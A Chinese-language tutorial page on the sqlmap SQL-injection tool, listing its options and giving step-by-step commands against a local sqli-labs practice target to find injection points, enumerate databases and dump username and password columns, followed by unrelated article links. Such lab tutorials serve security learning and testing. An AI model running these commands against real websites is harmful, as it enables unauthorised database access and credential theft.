sqlmap的使用方法
SQLmap的使用
参数
目标:至少要选中一个参数 -u URL, --url=URL 目标为 URL (例如. “http://www.site.com/vuln.php?id=1”) -g GOOGLEDORK 将谷歌dork的结果作为目标url 请求: 这些选项可用于指定如何连接到目标URL –data=DATA 数据字符串通过POST发送 –cookie=COOKIE HTTP Cookie的值 –random-agent 随机选择 HTTP User-Agent 头的值 –proxy=PROXY 使用代理去连接目标URL –tor 使用匿名网络 –check-tor 检查Tor是否正确使用 注入: 这些选项可用于指定要测试哪些参数,提供自定义注入负载和可选篡改脚本 -p TESTPARAMETER 可测试的参数 –dbms=DBMS 将后端DBMS强制到此值 检测: 这些选项可用于定制检测阶段 –level=LEVEL 执行的测试级别(1-5, 默认 1) –risk=RISK 执行测试的风险 (1-3, 默认 1) 技术: 这些选项可用于调整特定SQL注入的测试的技术 –technique=TECH SQL注入技术选择 (默认 “BEUSTQ”) 枚举: T这些选项可用于枚举后端数据库管理系统的信息、结构和数据表。此外,还可以运行自己的SQL语句 -a, --all 检索全部 -b, --banner 检索 banner –current-user 检索当前用户 –current-db 检索当前数据库 –passwords 列出用户密码的hash值 –tables 列出表 –columns 列出字段 –schema 列出DBMS schema –dump Dump DBMS数据库表的条目 –dump-all Dump 所有DBMS数据库表的条目 -D DB 指定数据库 -T TBL 指定表 -C COL 指定字段 操作系统访问: 这些选项可用于访问后端数据库管理系统底层操作系统 –os-shell 提示为交互式操作系统shell –os-pwn 提示为OOB外壳,Meterpreter或VNC 通用: 这些选项可用于设置一些通用的工作参数 –batch 永远不要要求用户输入,使用默认行为 –flush-session 刷新当前目标的会话文件 杂项: –sqlmap-shell 提示输入交互式sqlmap shell –wizard 初学者的简单向导界面
用于MySQL注入
GET类型
查找是否有注入点
python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-5/?id=1 --batch
查找数据库
python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-5/?id=1 --dbs --batch
查找当前数据库
python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-5/?id=1 --current-db --batch
查找表
python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-5/?id=1 -D sql --tables --batch
查找表中的列(字段)
python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-5/?id=1 -D sql -T users --columns --batch
查找字段中的数据
python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-5/?id=1 -D sql -T users -C"password,username" --dump --batch
POST类型
查找是否有注入点
python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-11/ --forms --batch
查找数据库
python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-11/ --forms --dbs --batch
查找当前数据库
python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-11/ --forms --current-db --batch
查找表
python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-11/ --forms -D sql --tables --batch
查找表中的列(字段)
python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-11/ --forms -D sql -T users --columns --batch
查找字段中的数据
python2 sqlmap.py -u http://192.168.232.128/sqllabs/Less-11/ --forms -D sql -T users -C"password,username" --dump --batch
- RBAC新解:基于资源的权限管理(Resource-Based Access Control)
- 基于开源项目搭建属于自己的技术堆栈
- Redis整合Spring项目搭建实例
- SpringMVC+Hibernate +MySql+ EasyUI实现POI导出Excel(二)
- Nginx+Tomcat+Redis负载均衡Session共享实现超级简单(CentOS6.9系统 Java版本)
- Apache Ignite——新一代数据库缓存系统
- 微信JSSDK接入Java版--步骤及问题处理和解决
- 微信企业号回调模式配置讲解 Java Servlet+Struts2版本 echostr校验失败解决
- Android Material Design系列之RecyclerView和CardView
- 在Linux安装ASP.Net Core的运行时(Runtime)
- 使用xUnit为.net core程序进行单元测试(下1)
- Otto开发初探——微服务依赖管理新利器
- Apache Eagle——eBay开源分布式实时Hadoop数据安全方案
- Spring/Hibernate 应用性能优化的7种方法
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- Selenium-01-测试环境搭建使用
- Selenium-02-常用元素定位
- SpringBoot + Vue 前后端分离项目下载视频文件踩坑记录
- Selenium-03-常用方法
- 用Python里面的Xpath完成一个在线汇率转换器
- 详解请求消息 resquest
- Android中窗口Input事件接收
- Linux下常用命令
- Cypress系列(53)- as() 命令详解
- Educational Codeforces Round 81 (Rated for Div. 2) A. Display The Number
- Cypress系列(55)- 设置全局 URL
- Linux不同共享库中同名函数的处理
- Cypress系列(56)- 避免访问多个站点
- Cypress系列(57)- 删除等待代码
- DOM 又是个什么鬼?